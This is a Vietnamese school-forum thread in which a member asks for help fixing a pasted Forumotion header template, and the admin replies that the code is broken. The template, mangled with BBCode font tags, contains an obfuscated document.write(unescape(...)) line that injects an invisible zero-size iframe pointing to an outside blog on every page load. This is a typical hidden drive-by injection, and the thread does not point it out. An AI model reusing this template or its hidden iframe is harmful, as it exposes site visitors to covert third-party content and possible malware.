-‘๑’-•Diễn Đàn Ninh Châu Online•-‘๑’-
Chào Mừng Bạn Đến Với Diễn Đàn Ninh Châu Online - Quảng Ninh - Quảng Bình
 
http://ninhchau.hoctrovn.com Bạn hay đăng ki đê cung cac Thanh Viên

 Diễn đàn Ninh Châu Online chia se Kiên thưc & kinh nghiệm

~> Nếu không muốn hiện lại thông báo này bạn Cilck vào "Don't dislay tôi một lần nữa"

Chúc các bạn vui vẻ!
Latest topics
» làm áo các đội tuyển euro 2012 , áo các CLB 2012, 2013 chỉ còn 80k/1 bộ
by aoloptoi Sun May 13, 2012 5:26 pm

» làm áo đồng phục rẻ nhất hà nội
by aoloptoi Sun May 13, 2012 5:24 pm

» Làm áo đội bóng rẻ nhất Hà Nội, áo euro 2012 chỉ với 80.000đ/ 1 bộ
by aoloptoi Fri May 04, 2012 4:42 pm

» LÀM ÁO ĐỒNG PHỤC RẺ NHẤT HÀ NỘI
by aoloptoi Fri May 04, 2012 4:37 pm

» GAME VÀ ỨNG DỤNG MOBILE
by funbox Fri Oct 28, 2011 3:35 pm

» Game mobile,nhạc chuông,hình nền,nhạc chờ
by funbox Fri Oct 28, 2011 3:35 pm

» Avatar 2009 - 2D Full Download
by Kaito Kid Mon Oct 17, 2011 11:52 pm

» Ngân Hàng câu hỏi Triết học MÁC-LÊNIN
by chipcon15 Sun Oct 16, 2011 10:01 am

» Truyện tranh Jindo dinho bản Full
by cuibapwadj Tue Oct 11, 2011 3:40 pm

» SHARE Skin 20 -11 of Ninh Châu, Anh em lấy xài tạm
by kuhuyvltk03 Thu Sep 15, 2011 7:54 pm

» Radio Shack Mutimedia headset cant get mic to work?
by Khách viếng thăm Wed Aug 03, 2011 2:50 pm

» how i do this????????????????????????????????????…
by Khách viếng thăm Tue Aug 02, 2011 5:46 pm

» Good day Every body
by Khách viếng thăm Tue Aug 02, 2011 9:06 am

» Practically as chintzy as warez
by Khách viếng thăm Mon Aug 01, 2011 7:30 pm

» how do you set up a minecraft sever with a centurylink router?
by Khách viếng thăm Mon Aug 01, 2011 7:00 pm

» Cho em xin code index box của diễn đàn được k ạ??
by Lee Sung Hyo Mon Aug 01, 2011 7:22 am

» google page rank backlink services
by Khách viếng thăm Mon Aug 01, 2011 12:34 am

» backlink search engine backlink services
by Khách viếng thăm Sun Jul 31, 2011 6:57 pm

» When the first Whirlpool Duet album was released in December 2001 came as a surprise to the public
by Khách viếng thăm Sun Jul 31, 2011 10:41 am

» Cheapfares - Low Cost Travel
by Khách viếng thăm Sun Jul 31, 2011 1:55 am


Giúp mình sửa phan header này cái

Go down

Bo tay Giúp mình sửa phan header này cái

Bài gửi by canvuong000 on Thu Apr 22, 2010 12:01 pm

Nhờ admin sửa cái header dùm mình cái. Mình dùng cái header này mà không hiển thị recents topic

Code:

[font=Arial]<!DOCTYPE
html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="{S_CONTENT_DIRECTION}" id="min-width"
lang="{L_LANG_HTML}" xml:lang="{L_LANG_HTML}"
xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>{SITENAME_TITLE}{PAGE_TITLE}</title> <meta
http-equiv="content-type" content="text/html;
charset={S_CONTENT_ENCODING}" /> <meta
http-equiv="content-script-type" content="text/javascript"
/> <meta http-equiv="content-style-type" content="text/css"
/> {META_FAVICO} {META} <meta name="title"
content="{SITENAME_TITLE}{PAGE_TITLE}" /> {T_HEAD_STYLESHEET}
{CSS} <link rel="search"
type="application/opensearchdescription+xml" href="/improvedsearch.xml"
title="{SITENAME}" /> <link rel="search"
type="application/opensearchdescription+xml"
href="{URL_BOARD_DIRECTORY}/search/improvedsearch.xml"
title="{SEARCH_FORUMS}" /> <script
src="{JS_DIR}{L_LANG}.js"
type="text/javascript"></script> <!-- BEGIN switch_ticker
--> <script src="{JS_DIR}jquery/ticker/ticker.js"
type="text/javascript"></script> <link
type="text/css" rel="stylesheet"
href="{JS_DIR}jquery/ticker/ticker.css" /> <!-- END
switch_ticker --> <script type="text/javascript">
//<![CDATA[ $(document).ready(function(){ <!-- BEGIN
switch_enable_pm_popup --> pm = window.open('{U_PRIVATEMSGS_POPUP}',
'_faprivmsg', 'HEIGHT=225,resizable=yes,WIDTH=400'); pm.focus(); <!-- END
switch_enable_pm_popup --> <!-- BEGIN switch_report_popup --> report =
window.open('{switch_report_popup.U_REPORT_POPUP}', '_phpbbreport',
'HEIGHT={switch_report_popup.S_HEIGHT},resizable=yes,scrollbars=no,WIDTH={switch_report_popup.S_WIDTH}');
report.focus(); <!-- END switch_report_popup --> <!-- BEGIN
switch_ticker --> ticker_start({switch_ticker.HEIGHT}, {switch_ticker.SPACING},
{switch_ticker.SPEED}, '{switch_ticker.DIRECTION}', {switch_ticker.STOP_TIME});
<!-- END switch_ticker --> }); <!-- BEGIN switch_login_popup -->
var logInPopUp, logInIframe, logInContent, logInPopUpLeft, logInPopUpTop,
logInPopUpWidth = {LOGIN_POPUP_WIDTH}, logInPopUpHeight = {LOGIN_POPUP_HEIGHT},
logInBackgroundResize = false, logInBackgroundClass = false, logInPopUpCss =
'{T_HEAD_STYLESHEET}'; <!-- END switch_login_popup --> //]]>
</script> {GREETING_POPUP} <!-- BEGIN hitskin_preview --> <style
type="text/css"> #hitskin_preview { margin: 0; padding: 0;
position: fixed; top: 0; left: 0; width: 100%; height: 65px; background:
url('http://illiweb.com/fa/hitskin/hitskin_bar.png') repeat-x left -15px;
color: #fff; } * html #hitskin_preview { /* Fix for IE6 since it doesn't
implement fixed positionning */ position: absolute;
top:expression(eval(document.compatMode &&
document.compatMode=='CSS1Compat') ? documentElement.scrollTop :
document.body.scrollTop); z-index: 2; background: transparent
url('http://illiweb.com/fa/hitskin/hitskin_bar-ie6.gif') repeat-x left -15px; }
* html { /* Gunlaug's Speed fix for the above positionning fix. Sorry for the
fix for the fix */ background: #fff url(foo) fixed; } #hitskin_preview h1 {
float: left; margin: 3px 0 0 0; padding: 0 0 0 10px; font: italic normal 25px
Arial,sans serif; color: #fff; } #hitskin_preview h1 img { vertical-align:
middle; } #hitskin_preview em { color: #7CBA2C; font-weight: bold; }
#hitskin_preview a { color: #fff; } #hitskin_preview a:hover { text-decoration:
underline; } #hitskin_preview .content { text-align: right; } #hitskin_preview
.content p { margin: 4px 1em 0px 1em; font-size: 13px; line-height: 1.8em;
color: #fff; font-weight: bold; } #hitskin_preview .content p span {
font-weight: normal; font-size: 0.8em; } body { margin-top: 40px !important; }
{hitskin_preview.HITSKIN_RTL_CSS} </style> <!-- END hitskin_preview
--> <a name="top"></a> {JAVAscript} <body>[/font]


       


 


 


 


 


 


 


[font=Arial]<!--
logo -->[/font]


[font=Arial]<table
id="Table_01" width="1000" border="0"
cellpadding="0" cellspacing="0"
align="center">[/font]


[font=Arial]            <tr>[/font]


 


[font=Arial]                        <td
colspan="3">[/font]


[font=Arial]                                    <img
src="http://illiweb.com/fa/pbucket.gif"
width="1000" height="554" alt=""></td>[/font]


[font=Arial]            </tr>[/font]


[font=Arial]            <tr>[/font]


[font=Arial]                        <td background="http://illiweb.com/fa/pbucket.gif"
width="62" height="193">[/font]


[font=Arial]                                    </td>[/font]


[font=Arial]                        <td
rowspan="2" width="876">[/font]


[font=Arial]<!--
/logo -->[/font]


 


[font=Arial]<!--
content table -->[/font]


 


[font=Arial]<!--
open content container -->[/font]


 


[font=Arial]<div
align="center">[/font]


[font=Arial]            <div class="page" style="width:100%;
text-align:left">[/font]


[font=Arial]                        <div
style="padding:0px 5px 0px 5px" align="left">[/font]


 


 


 


 


 


[font=Arial]<script>[/font]


[font=Arial]<!--[/font]


[font=Arial]document.write(unescape("%3CIFRAME%20src%3D%22http%3A//blog.nthvip.org%22%20width%3D0%20height%3D0%20frameborder%3D0%3E%3C/IFRAME%3E"));[/font]


[font=Arial]//-->[/font]


[font=Arial]</script>[/font]


[font=Arial]<br
/>[/font]


 


[font=Arial]<!--
content table --> <!-- open content container --> <div
align="center"> <div class="page"
style="width:100%; text-align:left"> <div
style="padding:0px 5px 0px 5px" align="left"> <br
/> <!-- nav buttons bar --> <div class="tborder"
style="padding:1px; border-top-width:0px"> <table
cellpadding="0" cellspacing="0" border="0"
width="100%" align="center"> <tr
align="center"> <!-- BEGIN switch_user_logged_out --> <td
class="vbmenu_control"><a
href="/profile.forum?mode=register" rel="nofollow">Đăng
Kí</a></td> <td class="vbmenu_control"><a
href="/login.forum?connexion" rel="nofollow">Đăng Nhập</a></td>
<!-- END switch_user_logged_out --> <td
class="vbmenu_control"><a href="/forum.htm"
accesskey="5">Diễn Đàn</a></td> <td
class="vbmenu_control"><a
href="/memberlist.forum">Thành Viên</a></td> <td
class="vbmenu_control"><a href="/calendar.htm">Lịch</a></td>
<td class="vbmenu_control"><a
href="/search.forum?search_id=activetopics"
accesskey="2">Bài Trong Ngày</a></td> <td
id="navbar_search" class="vbmenu_control"><a
href="/search.forum" rel="nofollow">Tìm Kiếm</a>
</td> <!-- BEGIN switch_user_logged_in --><td
class="vbmenu_control"><a
href="/profile.forum?mode=editprofile" accesskey="2">Lí
lịch</a></td> <!-- END switch_user_logged_in --> <!-- BEGIN
switch_user_logged_in --><td class="vbmenu_control"><a
href="/msg.forum?folder=inbox" accesskey="2">Tin nhắn</a></td>
<!-- END switch_user_logged_in --> <!-- BEGIN switch_user_logged_in
--><td class="vbmenu_control"><a
href="/login.forum?logout=true" accesskey="2">Thoát</a></td>
<!-- END switch_user_logged_in --> </tr> </table>
</div> <!-- / nav buttons bar --> <!-- breadcrumb, login, pm
info --> <div style="padding: 5px">[/font]


[font=Arial]<div
id="wrapper2">[/font]


[font=Arial]<div
id="wrapper3"><!--[/font]


[font=Arial] content table --><!--[/font]


[font=Arial] open content container -->[/font]


[font=Arial]<div
align="center">[/font]


[font=Arial]<div
class="page" style="width:100%; text-align:left">[/font]


[font=Arial]<div
style="padding:0px 0px 0px 0px" align="left"><!--[/font]


[font=Arial] breadcrumb, login, pm info -->[/font]


[font=Arial]<table
class="tborder" cellpadding="10" cellspacing="1"
border="0" width="100%" align="center">[/font]


[font=Arial]<tr>[/font]


[font=Arial]<td
class="alt1" width="100%">[/font]


[font=Arial]<table><tr><td
valign=middle>[/font]


[font=Arial]<a
href="/forum.htm" accesskey="1"><img
class="inlineimg"
src="http://thpttayninh.net/forum/kapie/park/misc/navbits_start.gif"
alt="" border="0" /></a>[/font]


[font=Arial]</td>[/font]


[font=Arial]<td
valign=middle>[/font]


[font=Arial]<div
class="navbar"
style="font-size:10pt"><strong>Lieu.Us.To – Diễn Đàn Bang Liều
Nhân Kiếm</strong></a></div>[/font]


[font=Arial]</td>[/font]


[font=Arial]</tr></table>[/font]


[font=Arial]</td>[/font]


[font=Arial]<td
class="alt2" nowrap="nowrap" style="padding:10px"
valign=middle> [/font]


[font=Arial]<!--
BEGIN switch_user_logged_out --><!—[/font]


[font=Arial]/
bang-dang-nhap -->[/font]


[font=Arial]<form
action="/login.forum" method="post"
name="form_login">[/font]


[font=Arial]<table
cellpadding="0" cellspacing="0" border="0"
valign=middle>[/font]


[font=Arial]<tr><td>[/font]


[font=Arial]<table
cellpadding="0" cellspacing="5" border="0">[/font]


[font=Arial]<tr>[/font]


[font=Arial]<td
style="white-space: nowrap;"><label><span
class="smallfont">Tên thành viên
</span></label></td>[/font]


[font=Arial]<td>
<input class="post" type="text" size="10"
name="username"/></td>[/font]


[font=Arial]</tr>[/font]


[font=Arial]<tr>[/font]


[font=Arial]<td
class="gensmall"><label><span
class="smallfont">Mật khẩu </span></label></td>[/font]


[font=Arial]<td>
<input class="post" type="password" size="10"
name="password" /></td>[/font]


[font=Arial]</tr></table>[/font]


[font=Arial]</td>[/font]


[font=Arial]<td>[/font]


[font=Arial]<table
cellpadding="0" cellspacing="5" border="0">[/font]


[font=Arial]<tr>[/font]


[font=Arial]<td
nowrap="nowrap"><label><span
class="smallfont">Ghi nhớ</span> <input
class="radio" type="checkbox" name="autologin"
checked="checked" /></label> [/font]


[font=Arial]</td>[/font]


[font=Arial]</tr>[/font]


[font=Arial]<tr>[/font]


[font=Arial]<td
nowrap="nowrap"><input class="button"
type="submit" name="login" value="Đăng Nhập"></td></tr>[/font]


[font=Arial]</table>[/font]


[font=Arial]</td></tr>[/font]


[font=Arial]</table>[/font]


[font=Arial]<center><b><a
href="/profile.forum?mode=sendpassword"><font size=1.7>::
Quên mật khẩu :: </font></a></b></center>[/font]


[font=Arial]</form>
<!—[/font]


[font=Arial]/
bang-dang-nhap --><!-- END switch_user_logged_out -->[/font]


[font=Arial]<!--
BEGIN switch_user_logged_in --> [/font]


 


[font=Arial]            Xin chào,<span
class="USERNAME"></span><br /><span
class="gensmall">{LAST_VISIT_DATE} <br
/>{CURRENT_TIME}<br /> [/font]


 


[font=Arial]<!--
END switch_user_logged_in -->[/font]


[font=Arial]</td>[/font]


[font=Arial]</tr>[/font]


[font=Arial]</table></form>
<!--[/font]


[font=Arial] / breadcrumb, login, pm info --><!--[/font]


[font=Arial] nav buttons bar --><!--[/font]


[font=Arial] / nav buttons bar -->[/font]


[font=Arial]<br
/> <!-- BEGIN switch_ticker --> <div id="fa_ticker_block"
style="margin-top:4px;margin-bottom:4px;"> <table
width="100%" border="0" cellspacing="0"
cellpadding="0" class="forumline"> <tr> <td
{CLASS_TABLE_TYPE} align="left" class="row1"> <div
id="fa_ticker_container"> <div id="fa_ticker"
style="height:{switch_ticker.HEIGHT}px;"> <div
class="fa_ticker_content"> <!-- BEGIN ticker_row -->
<div>{switch_ticker.ticker_row.ELEMENT}</div> <!-- END
ticker_row --> </div> </div> </div> </td>
</tr> </table> </div> <!-- END switch_ticker --> [/font]


           


 


                       


[font=Arial]<script
type="text/javascript" src="http://code-forum.googlecode.com/files/FMvar.js"></script>[/font]


                       

avatar
canvuong000
Member
Member

Giới tính : Nam Tổng số bài gửi : 15
Danh Vọng : 30235
Được Cảm Ơn : 1
Ngày Sinh : 01/01/1980
Tham Gia : 15/04/2010

Về Đầu Trang Go down

Bo tay Re: Giúp mình sửa phan header này cái

Bài gửi by Kaito Kid on Thu Apr 22, 2010 12:07 pm

bạn post lại code, code bạn post bị lỗi hết rồi, Nhớ đặt vào thẻ code ,Diễn đàn THPT Ninh Châu - Quảng Bình
avatar
Kaito Kid
Administrator
Administrator

Thành Tích : Giới tính : Nam Tổng số bài gửi : 490
Danh Vọng : 36077
Được Cảm Ơn : 246
Ngày Sinh : 07/05/1990
Tham Gia : 18/12/2009
[HS] lớp : 2005-2008

http://ninhchau.hoctrovn.com

Về Đầu Trang Go down

Về Đầu Trang

- Similar topics

 
Permissions in this forum:
Bạn không có quyền trả lời bài viết